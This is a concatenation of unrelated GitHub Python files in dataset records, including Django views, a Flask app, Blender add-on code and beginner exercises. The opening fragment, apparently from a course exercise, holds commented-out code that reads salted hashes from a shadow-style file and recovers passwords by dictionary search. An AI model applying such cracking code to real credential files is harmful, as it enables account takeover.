print(\"Num of bits are: \", i)\n # start_time = datetime.datetime.now()\n # print(findCollision(hexString, i))\n # end_time = datetime.datetime.now()\n # print(\"Time elapsed: \", end_time - start_time)\n # print(\"----\")\n\n # listOfUsers = readFile(\"shadow.txt\")\n # listOfWords = words.words()\n # newListOfWords = []\n # for word in listOfWords:\n # if len(word) >= 6 and len(word) <= 10:\n # newListOfWords.append(word)\n # for i in range(len(listOfUsers)):\n # username, salt, saltHash = gatherInfo(listOfUsers[i])\n # start_time = datetime.datetime.now()\n # password = findPassword(salt, saltHash, newListOfWords)\n # print(username, password, salt)\n # end_time = datetime.datetime.now()\n # print(\"Time elapsed: \", end_time - start_time)\n\n\nif __name__ == '__main__':\n main()\n ","repo_name":"Bharath-Joe/hashing_and_passwords","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39218146753","text":"import pika\nfrom django.conf import settings\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom nothotdog.photos.models import Photo\n\n\n@receiver(post_save, sender=Photo)\ndef upload_handler(sender, instance, created, **kwargs):\n # Do nothing if there was no new upload.\n if created:\n bytes_data = (instance.id).to_bytes(2, byteorder='big')\n send_photo_alert(bytes_data)\n\n\ndef send_photo_alert(message):\n connection = pika.BlockingConnection(\n pika.ConnectionParameters(host=settings.RABBITMQ_HOST)\n )\n channel = connection.channel()\n\n channel.queue_declare(queue='hotdog_alert')\n channel.basic_publish(\n exchange='',\n routing_key='hotdog_alert',\n body=message,\n properties=pika.BasicProperties(\n delivery_mode=2, # Make message persistent.\n )\n )\n connection.close()\n","repo_name":"jesper-trell/trell-hell","sub_path":"project2/nothotdog/nothotdog/photos/signals/upload_handler.py","file_name":"upload_handler.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"10278096486","text":"#!/usr/bin/env python\n# encoding=utf-8\n# maintainer: rgaudin\n\nfrom django import forms\nfrom django.contrib import messages\nfrom django.shortcuts import render, redirect\nfrom django.utils.translation import ugettext as _, ugettext_lazy\nfrom django.conf import settings\n\nfrom nosmsd.models import Inbox, SentItems\nfrom bolibana.web.decorators import provider_required\nfrom bolibana.tools.utils import send_email\nfrom pnlp_core.models import MalariaReport\nfrom pnlp_core.data import current_reporting_period, contact_for\n\n\ndef nb_reports_for(entity, period):\n nb_rec = MalariaReport.objects.filter(entity__parent=entity,\n period=period).count()\n next_period = period.next()\n if entity.type.slug == 'district':\n nb_ent = entity.get_children().count()\n incoming_sms = None\n all_sms = None\n else:\n nb_ent = 1\n number = contact_for(entity, True).phone_number\n if not number is None and number.startswith('+223'):\n number = '+223' + number\n incoming_sms = Inbox.objects.filter(receivingdatetime__gte=next_period.start_on,\n receivingdatetime__lte=next_period.end_on,\n sendernumber=number)\n sent_sms = SentItems.objects.filter(sendingdatetime__gte=next_period.start_on,\n sendingdatetime__lte=next_period.end_on,\n destinationnumber=number)\n if incoming_sms.count() != sent_sms.count():\n all_sms = list(incoming_sms) + list(sent_sms)\n else:\n all_sms = sent_sms\n\n percent = float(nb_rec) / nb_ent\n return {'entity': entity, 'nb_received': nb_rec,\n 'nb_expected': nb_ent,\n 'received_rate': percent,\n 'incoming_sms': incoming_sms,\n 'all_sms': all_sms}\n\n\ndef contact_choices(contacts):\n \"\"\" returns (a[0], a[1] for a in a list \"\"\"\n # SUPPORT_CONTACTS contains slug, name, email\n # we need only slug, name for contact form.\n return [(slug, name) for slug, name, email in settings.SUPPORT_CONTACTS]\n\n\nclass ContactForm(forms.Form):\n \"\"\" Simple contact form with recipient choice \"\"\"\n\n name = forms.CharField(max_length=50, required=True, \\\n label=ugettext_lazy(u\"Your Name\"))\n email = forms.EmailField(required=False, \\\n label=ugettext_lazy(u\"Your e-mail address\"))\n phone_number = forms.CharField(max_length=12, required=False, \\\n label=ugettext_lazy(u\"Your phone number\"))\n subject = forms.CharField(max_length=50, required=False, \\\n label=ugettext_lazy(u\"Subject\"))\n\n recipient = forms.ChoiceField(required=False, \\\n label=ugettext_lazy(u\"Recipient\"), \\\n choices=contact_choices(settings.SUPPORT_CONTACTS), \\\n help_text=_(u\"Choose PNLP for operational \" \\\n u\"requests and ANTIM for \" \\\n u\"technical ones.\"))\n\n message = forms.CharField(required=True, \\\n label=ugettext_lazy(u\"Your request\"), \\\n widget=forms.Textarea)\n\n\ndef contact(request):\n category = 'contact'\n context = {'category': category}\n\n try:\n web_provider = request.user.get_profile()\n except:\n web_provider = None\n\n if request.method == 'POST':\n form = ContactForm(request.POST)\n\n if form.is_valid():\n try:\n dest_mail = [email for s, n, email \\\n in settings.SUPPORT_CONTACTS \\\n if s == 'pnlp'][0]\n except:\n dest_mail = []\n\n mail_cont = {'provider': web_provider, \\\n 'name': form.cleaned_data.get('name'),\n 'email': form.cleaned_data.get('email'),\n 'phone_number': form.cleaned_data.get('phone_number'),\n 'subject': form.cleaned_data.get('subject'),\n 'message': form.cleaned_data.get('message')}\n\n sent, sent_message = send_email(recipients=dest_mail, \\\n context=mail_cont,\n template='emails/support_request.txt', \\\n title_template='emails/title.support_request.txt')\n if sent:\n messages.success(request, _(u\"Support request sent.\"))\n return redirect('support')\n else:\n messages.error(request, _(u\"Unable to send request. Please \" \\\n \"try again later.\"))\n\n if request.method == 'GET':\n if web_provider:\n initial_data = {'name': web_provider.name_access, \\\n 'email': web_provider.email, \\\n 'phone_number': web_provider.phone_number}\n else:\n initial_data = {}\n\n form = ContactForm(initial=initial_data)\n\n context.update({'form': form})\n\n return render(request, 'contact.html', context)\n\n\n@provider_required\ndef dashboard(request):\n category = 'dashboard'\n context = {'category': category}\n\n from bolibana.models import Entity\n from pnlp_core.data import (current_period, current_stage, \\\n time_cscom_over, time_district_over, \\\n time_region_over)\n\n def sms_received_sent_by_period(period):\n received = Inbox.objects.filter(receivingdatetime__gte=period.start_on,\n receivingdatetime__lte=period.end_on) \\\n .count()\n sent = SentItems.objects.filter(sendingdatetime__gte=period.start_on,\n sendingdatetime__lte=period.end_on) \\\n .count()\n return (received, sent)\n\n def received_reports(period, type_):\n return MalariaReport.objects.filter(period=period, \\\n entity__type__slug=type_)\n\n def reports_validated(period, type_):\n return MalariaReport.validated.filter(period=period, \\\n entity__type__slug=type_)\n\n def reporting_rate(period, entity):\n return float(MalariaReport.validated.filter(period=period, \\\n entity__parent=entity).count()) \\\n / Entity.objects.filter(parent__slug=entity.slug).count()\n\n current_period = current_period()\n period = current_reporting_period()\n\n context.update({'current_period': current_period,\n 'current_reporting_period': period,\n 'current_stage': current_stage(),\n 'current_sms': sms_received_sent_by_period(current_period),\n 'current_reporting_sms': \\\n sms_received_sent_by_period(period),\n 'total_cscom': Entity.objects\\\n .filter(type__slug='cscom').count(),\n 'time_cscom_over': time_cscom_over(period),\n 'time_district_over': time_district_over(period),\n 'time_region_over': time_region_over(period)})\n\n received_cscom_reports = received_reports(period, 'cscom')\n cscom_reports_validated = reports_validated(period, 'cscom')\n district_reports_validated = reports_validated(period, 'district')\n reporting_rate = \\\n float(MalariaReport.validated.filter(period=period).count()) \\\n / Entity.objects.count()\n\n cscom_missed_report = \\\n Entity.objects.filter(type__slug='cscom')\\\n .exclude(id__in=[r.entity.id \\\n for r \\\n in received_cscom_reports])\\\n .order_by('name')\n\n def entities_autoreports(level):\n districts_missed_report = {}\n auto_validated_cscom_reports = \\\n MalariaReport.validated\\\n .filter(entity__type__slug=level, \\\n modified_by__user__username='autobot')\n for report in auto_validated_cscom_reports:\n if not report.entity.parent.slug in districts_missed_report:\n districts_missed_report[report.entity.parent.slug] = \\\n {'entity': report.entity.parent, \\\n 'nbauto': 0, \\\n 'contact': contact_for(report.entity.parent, False)}\n districts_missed_report[report.entity.parent.slug]['nbauto'] += 1\n return districts_missed_report\n\n districts_missed_report = entities_autoreports('cscom')\n regions_missed_report = entities_autoreports('district')\n\n context.update({'received_cscom_reports': received_cscom_reports.count(),\n 'cscom_reports_validated': cscom_reports_validated.count(),\n 'district_reports_validated': district_reports_validated.count(),\n 'reporting_rate': reporting_rate,\n 'cscom_missed_report_count': cscom_missed_report.count(),\n 'cscom_missed_report': [(e, contact_for(e, True)) \\\n for e in cscom_missed_report[:20]],\n 'districts_missed_report': districts_missed_report,\n 'regions_missed_report': regions_missed_report})\n\n return render(request, 'dashboard.html', context)\n\n\nclass DateForm(forms.Form):\n import datetime\n date = forms.DateField(initial=datetime.date.today)\n\n\ndef change_date(request):\n\n context = {}\n\n if request.method == 'POST':\n form = DateForm(request.POST)\n if form.is_valid():\n import subprocess\n subprocess.call(['sudo', 'date', form.cleaned_data.get('date') \\\n .strftime('%m%d1200%Y')])\n context.update({'success': True})\n else:\n pass\n else:\n form = DateForm()\n\n context.update({'form': form})\n\n return render(request, 'date.html', context)\n","repo_name":"yeleman/pnlp2011","sub_path":"pnlp_web/views/dashboard.py","file_name":"dashboard.py","file_ext":"py","file_size_in_byte":10295,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"22598713439","text":"# Write a Python program to convert seconds to day, hour, minutes and seconds.\ntime = float(input(\"Input time in seconds: \"))\nday = time // 86400\ntime = time % 86400\nhour = time //3600\ntime = time % 3600\nminute = time //60\ntime =time % 60\nsecond = time\n\nprint(f'Days = {day} Hour = {hour} Minutes = {minute} Second = {second}')","repo_name":"prajwal60/ListQuestions","sub_path":"learning/BasicQuestions/Qsn65.py","file_name":"Qsn65.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"18699571792","text":"import flask\nfrom flask import Flask, render_template, request\nimport json\nfrom transliterate.base import TranslitLanguagePack, registry\nfrom transliterate import get_available_language_codes, translit, get_translit_function\nfrom transliterate.discover import autodiscover\nimport nltk\nimport language_tool_python as ltp\nfrom pymorphy2 import MorphAnalyzer\nfrom KDTree import KDTree\n\n\n\nclass KBDLanguagePack(TranslitLanguagePack):\n language_code = \"kbd\"\n language_name = \"KeyBoard\"\n mapping = (\n 'QWERTYUIOP{}ASDFGHJKL:\"ZXCVBNM<>?qwertyuiop[]asdfghjkl;\\'zxcvbnm,./',\n 'ЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЯЧСМИТЬБЮ,йцукенгшщзхъфывапролджэячсмитьбю.',\n )\n\n\n\nautodiscover()\nregistry.register(KBDLanguagePack)\n\ntranslit_ru = get_translit_function('ru')\ntranslit_kbd = get_translit_function('kbd')\n\ntool_en = ltp.LanguageTool('en-US')\ntool_ru = ltp.LanguageTool('ru-RU')\n\n\ndef normalize_text(src: str):\n src_str = src\n kbd_str_ru = translit_kbd(src)\n kbd_str_en = translit_kbd(src, reversed=True)\n str_ru = translit_ru(src)\n str_en = translit_ru(src, reversed=True)\n translits = [src_str, kbd_str_ru, kbd_str_en, str_ru, str_en]\n correct_ru = list(map(lambda x: tool_ru.correct(x), translits))\n correct_en = list(map(lambda x: tool_en.correct(x), translits))\n return [*correct_ru, *correct_en]\n\n\napp = Flask(__name__,\n static_url_path='', \n static_folder='static',\n template_folder='templates')\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n\n@app.route('/search', methods=['POST'])\ndef query_example():\n text = request.get_data(as_text=True)\n # print(text)\n # normed_text = normalize_text(text)\n requestt = tool_ru.correct(text.lower())\n print(requestt)\n data = [{'':item} for item in enumerate(KDTree.find(requestt).to_list())]\n return json.dumps(data, ensure_ascii=False)\n\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)","repo_name":"mikkon2409/tenderhack-2022","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"75000720224","text":"import random\n\n# $$$$$ SOLLUTION 1 $$$$$\n# class GuessingGame():\n# def __init__(self, answer_number):\n# self.answer_number = answer_number\n# self.solved = False\n\n# def guess(self, user_guess):\n# if user_guess > self.answer_number:\n# return 'High'\n# elif user_guess < self.answer_number:\n# # print('low')\n# return 'Low'\n# else:\n# self.solved = True\n# return 'Correct'\n \n# def solved(self):\n# return self.solved\n\n# game = GuessingGame(10)\n# print(game.guess(1))\n# print(game.solved)\n\n# $$$$$ SOLLUTION 2 $$$$$\n\nclass GuessingGame():\n def __init__(self, answer_number):\n self.answer_number = answer_number\n self.solved = False\n\n def guess(self, last_guess):\n if last_guess > self.answer_number:\n return 'High'\n elif last_guess < self.answer_number:\n return 'Low'\n else:\n self.solved = True\n return 'Correct'\n \n def solved(self):\n return self.solved\n\n\n# ----- main.py -----\ngame = GuessingGame(random.randint(1,100))\nlast_guess = None\nlast_result = None\n\nwhile game.solved == False:\n if last_guess != None: \n print(f\"Oops! Your last guess ({last_guess}) was {last_result}.\")\n print(\"\")\n\n last_guess = int(input(\"Enter your guess: \")) \n last_result = game.guess(last_guess)\n\n\nprint(f\"{last_guess} was correct!\")","repo_name":"robertuptc/oop-guessing-game-2023","sub_path":"guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24049266197","text":"from Constant import Constant\n\n\nclass Ball:\n \"\"\"A class for keeping info about the balls\"\"\"\n def __init__(self, ball):\n self.x = ball[2]\n self.y = Constant.Y_MAX - ball[3]\n self.radius = ball[4]\n self.color = '#ff8c00' # Hardcoded orange\n","repo_name":"dimitrisnikolaou10/nba_shot_probability_sportvu","sub_path":"animate/Ball.py","file_name":"Ball.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"29402939168","text":"bl_info = {\n \"name\": \"Lightsheet\",\n \"author\": \"Markus Ebke\",\n \"version\": (1, 2),\n \"blender\": (3, 2, 0),\n \"location\": \"View3D > Sidebar > Lightsheet Tab\",\n \"description\": \"Create fake caustics renderable in Cycles and EEVEE\",\n \"warning\": \"\",\n \"doc_url\": \"https://blenderartists.org/t/lightsheet-caustics-for-cycles-and-eevee/1292193\",\n \"tracker_url\": \"https://github.com/markus-ebke/Blender-Lightsheet/issues\",\n \"category\": \"Lighting\",\n}\n\n# support reloading scripts and addons\nif \"bpy\" in locals():\n import importlib\n\n importlib.reload(create_lightsheet)\n importlib.reload(trace_lightsheet)\n importlib.reload(refine_caustic)\n importlib.reload(finalize_caustic)\n importlib.reload(visualize_raypath)\n importlib.reload(animated_trace)\n importlib.reload(properties)\n importlib.reload(ui)\n\n print(\"Lighsheet: Addon reloaded\")\nelse:\n from lightsheet import (create_lightsheet,\n trace_lightsheet,\n refine_caustic,\n finalize_caustic,\n visualize_raypath,\n animated_trace,\n properties,\n ui)\n\n print(\"Lightsheet: Addon loaded\")\n\nimport bpy\nfrom bpy.utils import register_class, unregister_class\n\n\n# registration\nclasses = (\n create_lightsheet.LIGHTSHEET_OT_create_lightsheets,\n trace_lightsheet.LIGHTSHEET_OT_trace_lightsheets,\n refine_caustic.LIGHTSHEET_OT_refine_caustics,\n finalize_caustic.LIGHTSHEET_OT_finalize_caustics,\n visualize_raypath.LIGHTSHEET_OT_visualize_raypath,\n animated_trace.LIGHTSHEET_OT_animated_trace,\n properties.CausticPathLink,\n properties.CausticRefinementSetting,\n properties.CausticInfo,\n ui.LIGHTSHEET_PT_tools,\n ui.LIGHTSHEET_PT_object,\n ui.LIGHTSHEET_PT_caustic,\n ui.LIGHTSHEET_PT_raypath,\n)\n\n\ndef register():\n for cls in classes:\n register_class(cls)\n\n bpy.types.Object.caustic_info = bpy.props.PointerProperty(\n type=properties.CausticInfo)\n\n print(\"Lightsheet: Addon registered\")\n\n\ndef unregister():\n del bpy.types.Object.caustic_info\n\n for cls in reversed(classes):\n unregister_class(cls)\n\n print(\"Lightsheet: Addon unregistered\")\n\n\nif __name__ == \"__main__\":\n register()\n","repo_name":"markus-ebke/Blender-Lightsheet","sub_path":"lightsheet/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"7"} +{"seq_id":"45338055464","text":"import bpy\nfrom mathutils import Vector\n\nimport os.path as op\n\nfrom .LOOKUPS import DIFFUSE, MASKS, NORMAL, DIFFUSE2 # noqa pylint: disable=relative-beyond-top-level\nfrom ..ModelImporter.readers import read_material # noqa pylint: disable=relative-beyond-top-level\nfrom ..utils.io import realize_path # noqa pylint: disable=relative-beyond-top-level\n\n\ndef create_material_node(mat_path: str, local_root_directory: str):\n # Read the material data directly from the material MBIN\n mat_data = read_material(mat_path)\n if mat_data is None or mat_data == dict():\n # no texture data so just exit this function.\n return\n # create a new material\n mat_name = mat_data.pop('Name')\n mat = bpy.data.materials.new(name=mat_name)\n\n uniforms = mat_data['Uniforms']\n\n # Since we are using cycles we want to have node-based materials\n mat.use_nodes = True\n\n # Add some material settings:\n CastShadow = mat_data['CastShadow']\n if CastShadow:\n mat.shadow_method = 'OPAQUE'\n\n nodes = mat.node_tree.nodes\n links = mat.node_tree.links\n # clear any existing nodes just to be safe.\n nodes.clear()\n # Now add all the nodes we need.\n output_material = nodes.new(type='ShaderNodeOutputMaterial')\n output_material.location = (500, 0)\n principled_BSDF = nodes.new(type='ShaderNodeBsdfPrincipled')\n principled_BSDF.location = (200, 150)\n principled_BSDF.inputs['Roughness'].default_value = 1.0\n FRAGMENT_COLOUR0 = principled_BSDF.outputs['BSDF']\n\n # Set up some constants\n if 61 in mat_data['Flags']:\n kfAlphaThreshold = 0.1\n kfAlphaThresholdMax = 0.5\n elif 10 in mat_data['Flags']:\n kfAlphaThreshold = 0.45\n kfAlphaThresholdMax = 0.8\n else:\n kfAlphaThreshold = 0.0001\n\n if 0 not in mat_data['Flags']:\n rgb_input = nodes.new(type='ShaderNodeRGB')\n rgb_input.outputs[0].default_value[0] = uniforms['gMaterialColourVec4'][0] # noqa\n rgb_input.outputs[0].default_value[1] = uniforms['gMaterialColourVec4'][1] # noqa\n rgb_input.outputs[0].default_value[2] = uniforms['gMaterialColourVec4'][2] # noqa\n rgb_input.outputs[0].default_value[3] = uniforms['gMaterialColourVec4'][3] # noqa\n lColourVec4 = rgb_input.outputs['Color']\n\n # TODO: restructure all this to be as similar to the actual shaders as\n # possible\n\n # create the diffuse, mask and normal nodes and give them their images\n for tex_type, tex_path in mat_data['Samplers'].items():\n img = None\n if tex_type == DIFFUSE:\n # texture\n _path = realize_path(tex_path, local_root_directory)\n if _path is not None and op.exists(_path):\n img = bpy.data.images.load(_path)\n diffuse_texture = nodes.new(type='ShaderNodeTexImage')\n diffuse_texture.name = diffuse_texture.label = 'Texture Image - Diffuse' # noqa\n diffuse_texture.image = img\n diffuse_texture.location = (-600, 300)\n lColourVec4 = diffuse_texture.outputs['Color']\n if 15 in mat_data['Flags']:\n # #ifdef _F16_DIFFUSE2MAP\n if 16 not in mat_data['Flags']:\n # #ifndef _F17_MULTIPLYDIFFUSE2MAP\n diffuse2_path = realize_path(\n mat_data['Samplers'][DIFFUSE2], local_root_directory)\n if op.exists(diffuse2_path):\n img = bpy.data.images.load(diffuse2_path)\n diffuse2_texture = nodes.new(type='ShaderNodeTexImage')\n diffuse2_texture.name = diffuse_texture.label = 'Texture Image - Diffuse2' # noqa\n diffuse2_texture.image = img\n diffuse2_texture.location = (-400, 300)\n mix_diffuse = nodes.new(type='ShaderNodeMixRGB')\n mix_diffuse.location = (-200, 300)\n links.new(mix_diffuse.inputs['Color1'],\n lColourVec4)\n links.new(mix_diffuse.inputs['Color2'],\n diffuse2_texture.outputs['Color'])\n links.new(mix_diffuse.inputs['Fac'],\n diffuse2_texture.outputs['Alpha'])\n lColourVec4 = mix_diffuse.outputs['Color']\n else:\n print('Note: Please post on discord the model you are'\n ' importing so I can fix this!!!')\n # #ifndef _F44_IMPOSTER\n if 43 not in mat_data['Flags']:\n # #ifdef _F39_METALLIC_MASK\n if 38 in mat_data['Flags']:\n links.new(principled_BSDF.inputs['Metallic'],\n diffuse_texture.outputs['Alpha'])\n else:\n # use the default value from the file\n if 'gMaterialParamsVec4' in uniforms:\n principled_BSDF.inputs['Metallic'].default_value = uniforms['gMaterialParamsVec4'][2] # noqa\n elif tex_type == MASKS:\n # texture\n _path = realize_path(tex_path, local_root_directory)\n if _path is not None and op.exists(_path):\n img = bpy.data.images.load(_path)\n img.colorspace_settings.name = 'XYZ'\n mask_texture = nodes.new(type='ShaderNodeTexImage')\n mask_texture.name = mask_texture.label = 'Texture Image - Mask'\n mask_texture.image = img\n mask_texture.location = (-700, 0)\n lfRoughness = None\n # RGB separation node\n separate_rgb = nodes.new(type='ShaderNodeSeparateRGB')\n separate_rgb.location = (-400, 0)\n links.new(separate_rgb.inputs['Image'],\n mask_texture.outputs['Color'])\n if 43 not in mat_data['Flags']:\n # #ifndef _F44_IMPOSTER\n if 24 in mat_data['Flags']:\n # #ifdef _F25_ROUGHNESS_MASK\n # lfRoughness = 1 - lMasks.g\n # subtract the green channel from 1:\n sub_1 = nodes.new(type=\"ShaderNodeMath\")\n sub_1.operation = 'SUBTRACT'\n sub_1.location = (-200, 0)\n sub_1.inputs[0].default_value = 1.0\n lfRoughness = sub_1.outputs['Value']\n # link them up\n links.new(sub_1.inputs[1], separate_rgb.outputs['G'])\n else:\n roughness_value = nodes.new(type='ShaderNodeValue')\n roughness_value.outputs[0].default_value = 1.0\n lfRoughness = roughness_value.outputs['Value']\n # lfRoughness *= lUniforms.mpCustomPerMaterial->gMaterialParamsVec4.x; # noqa\n mult_param_x = nodes.new(type=\"ShaderNodeMath\")\n mult_param_x.operation = 'MULTIPLY'\n mult_param_x.inputs[1].default_value = uniforms[\n 'gMaterialParamsVec4'][0]\n links.new(mult_param_x.inputs[0], lfRoughness)\n lfRoughness = mult_param_x.outputs['Value']\n if lfRoughness is not None:\n links.new(principled_BSDF.inputs['Roughness'],\n lfRoughness)\n # If the roughness wasn't ever defined then the default value is 1\n # which is what blender has as the default anyway\n\n # gMaterialParamsVec4.x\n # #ifdef _F40_SUBSURFACE_MASK\n if 39 in mat_data['Flags']:\n links.new(principled_BSDF.inputs['Subsurface'],\n separate_rgb.outputs['R'])\n if 43 in mat_data['Flags']:\n # lfMetallic = lMasks.b;\n links.new(principled_BSDF.inputs['Metallic'],\n separate_rgb.outputs['B'])\n\n elif tex_type == NORMAL:\n # texture\n _path = realize_path(tex_path, local_root_directory)\n if _path is not None and op.exists(_path):\n img = bpy.data.images.load(_path)\n img.colorspace_settings.name = 'XYZ'\n normal_texture = nodes.new(type='ShaderNodeTexImage')\n normal_texture.name = normal_texture.label = 'Texture Image - Normal' # noqa\n normal_texture.image = img\n normal_texture.location = (-700, -300)\n # separate xyz then recombine\n normal_sep_xyz = nodes.new(type='ShaderNodeSeparateXYZ')\n normal_sep_xyz.location = (-400, -300)\n normal_com_xyz = nodes.new(type='ShaderNodeCombineXYZ')\n normal_com_xyz.location = (-200, -300)\n # swap X and Y channels\n links.new(normal_com_xyz.inputs['X'],\n normal_sep_xyz.outputs['Y'])\n links.new(normal_com_xyz.inputs['Y'],\n normal_sep_xyz.outputs['X'])\n links.new(normal_com_xyz.inputs['Z'],\n normal_sep_xyz.outputs['Z'])\n\n # normal map\n normal_map = nodes.new(type='ShaderNodeNormalMap')\n normal_map.location = (0, -300)\n # link them up\n links.new(normal_sep_xyz.inputs['Vector'],\n normal_texture.outputs['Color'])\n links.new(normal_map.inputs['Color'],\n normal_com_xyz.outputs['Vector'])\n links.new(principled_BSDF.inputs['Normal'],\n normal_map.outputs['Normal'])\n\n if 42 in mat_data['Flags']:\n # lTexCoordsVec4.xy *= lUniforms.mpCustomPerMesh->gCustomParams01Vec4.z; # noqa\n normal_scale = nodes.new(type='ShaderNodeMapping')\n normal_scale.location = (-1000, -300)\n scale = uniforms['gCustomParams01Vec4'][2]\n normal_scale.inputs['Scale'].default_value = Vector((scale, scale, scale)) # noqa\n tex_coord = nodes.new(type='ShaderNodeTexCoord')\n tex_coord.location = (-1200, -300)\n tex_coord.object = bpy.context.active_object\n links.new(normal_scale.inputs['Vector'],\n tex_coord.outputs['Generated'])\n links.new(normal_texture.inputs['Vector'],\n normal_scale.outputs['Vector'])\n\n # Apply some final transforms to the data before connecting it to the\n # Material output node\n\n if 20 in mat_data['Flags'] or 28 in mat_data['Flags']:\n # #ifdef _F21_VERTEXCOLOUR\n # lColourVec4 *= IN( mColourVec4 );\n col_attribute = nodes.new(type='ShaderNodeAttribute')\n col_attribute.attribute_name = 'Col'\n mix_colour = nodes.new(type='ShaderNodeMixRGB')\n links.new(mix_colour.inputs['Color1'],\n lColourVec4)\n links.new(mix_colour.inputs['Color2'],\n col_attribute.outputs['Color'])\n links.new(principled_BSDF.inputs['Base Color'],\n mix_colour.outputs['Color'])\n lColourVec4 = mix_colour.outputs['Color']\n\n if (8 in mat_data['Flags'] or 10 in mat_data['Flags'] or\n 21 in mat_data['Flags']):\n # Handle transparency\n alpha_mix = nodes.new(type='ShaderNodeMixShader')\n alpha_shader = nodes.new(type='ShaderNodeBsdfTransparent')\n if 0 in mat_data['Flags']:\n # If there is a diffuse texture we use this to get rid of\n # transparent pixels\n discard_node = nodes.new(type=\"ShaderNodeMath\")\n discard_node.operation = 'LESS_THAN'\n discard_node.inputs[1].default_value = kfAlphaThreshold\n lColourVec4_a = diffuse_texture.outputs['Alpha']\n\n links.new(discard_node.inputs[0], lColourVec4_a)\n lColourVec4_a = discard_node.outputs['Value']\n\n if 10 in mat_data['Flags']:\n clamp_node = nodes.new(type='ShaderNodeClamp')\n clamp_node.clamp_type = 'RANGE'\n clamp_node.location = (500, -300)\n clamp_node.inputs['Min'].default_value = kfAlphaThreshold\n clamp_node.inputs['Max'].default_value = kfAlphaThresholdMax\n\n links.new(clamp_node.inputs['Value'], lColourVec4_a)\n lColourVec4_a = clamp_node.outputs['Result']\n\n links.new(alpha_mix.inputs['Fac'], lColourVec4_a)\n # If the material has any transparency we want to specify this in\n # the material\n mat.blend_method = 'BLEND'\n else:\n # if there isn't we will use the material colour as the base\n # colour of the transparency shader\n links.new(alpha_shader.inputs['Color'],\n lColourVec4)\n\n links.new(alpha_mix.inputs[1],\n FRAGMENT_COLOUR0)\n links.new(alpha_mix.inputs[2],\n alpha_shader.outputs['BSDF'])\n\n FRAGMENT_COLOUR0 = alpha_mix.outputs['Shader']\n\n if 50 in mat_data['Flags']:\n # #ifdef _F51_DECAL_DIFFUSE\n # FRAGMENT_COLOUR0 = vec4( lOutColours0Vec4.xyz, lColourVec4.a );\n alpha_mix_decal = nodes.new(type='ShaderNodeMixShader')\n alpha_shader = nodes.new(type='ShaderNodeBsdfTransparent')\n links.new(alpha_mix_decal.inputs['Fac'],\n diffuse_texture.outputs['Alpha'])\n links.new(alpha_mix_decal.inputs[1],\n alpha_shader.outputs['BSDF'])\n links.new(alpha_mix_decal.inputs[2],\n FRAGMENT_COLOUR0)\n FRAGMENT_COLOUR0 = alpha_mix_decal.outputs['Shader']\n\n # Link up the diffuse colour to the base colour on the prinicipled BSDF\n # shader.\n links.new(principled_BSDF.inputs['Base Color'],\n lColourVec4)\n\n # Finally, link the fragment colour to the output material.\n links.new(output_material.inputs['Surface'],\n FRAGMENT_COLOUR0)\n\n # link some nodes up according to the uberfragment.bin shader\n # TODO: fix this at some point...\n # https://blender.stackexchange.com/questions/21533/totally-white-shadeless-material-in-cycles\n # if 6 in mat_data['Flags']:\n # mat.use_shadeless = True\n\n return mat\n","repo_name":"monkeyman192/NMSDK","sub_path":"NMS/material_node.py","file_name":"material_node.py","file_ext":"py","file_size_in_byte":14141,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"7"} +{"seq_id":"29981582435","text":"#!/usr/bin/python3\n\"\"\"add_integer function returns the sum of two integers\n\nworks for two integers\n>>> add_integer(2, 2)\n4\n\"\"\"\n\n\ndef add_integer(a, b=98):\n \"\"\"returns sum of two intergers\n numbers must be casted to integers before adding\n\n >>> add_integer(-1, -2)\n -3\n \"\"\"\n max_float_num = 3.402823466e+38\n min_float_num = 1.175494351e-38\n\n if not isinstance(a, (int, float)):\n raise TypeError('a must be an integer')\n if not isinstance(b, (int, float)):\n raise TypeError('b must be an integer')\n\n if (a > max_float_num):\n raise TypeError(\"a must be an integer\")\n if (b > max_float_num):\n raise TypeError(\"b must be an integer\")\n\n if isinstance(a, float):\n a = int(a)\n if isinstance(b, float):\n b = int(b)\n\n return a + b\n","repo_name":"elnino10/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/0-add_integer.py","file_name":"0-add_integer.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"1174773187","text":"import threading\nimport time\nfrom QM_se import get_info\n\n\nexitFlag = 0\n\n\nclass myThread(threading.Thread):\n def __init__(self, threadID, name, counter):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.counter = counter\n\n def run(self): # Put what you want to run here\n print(\"Starting \" + self.name)\n get_info(self.name)\n # sleep minutes\n sleep_minutes = 60\n for i in range(sleep_minutes):\n time.sleep(60)\n print(\"Exiting \" + self.name)\n\n\ndef print_time(threadName, delay, counter):\n while counter:\n if exitFlag:\n (threading.Thread).exit()\n time.sleep(delay)\n print(\"%s: %s\" % (threadName, time.ctime(time.time())))\n counter -= 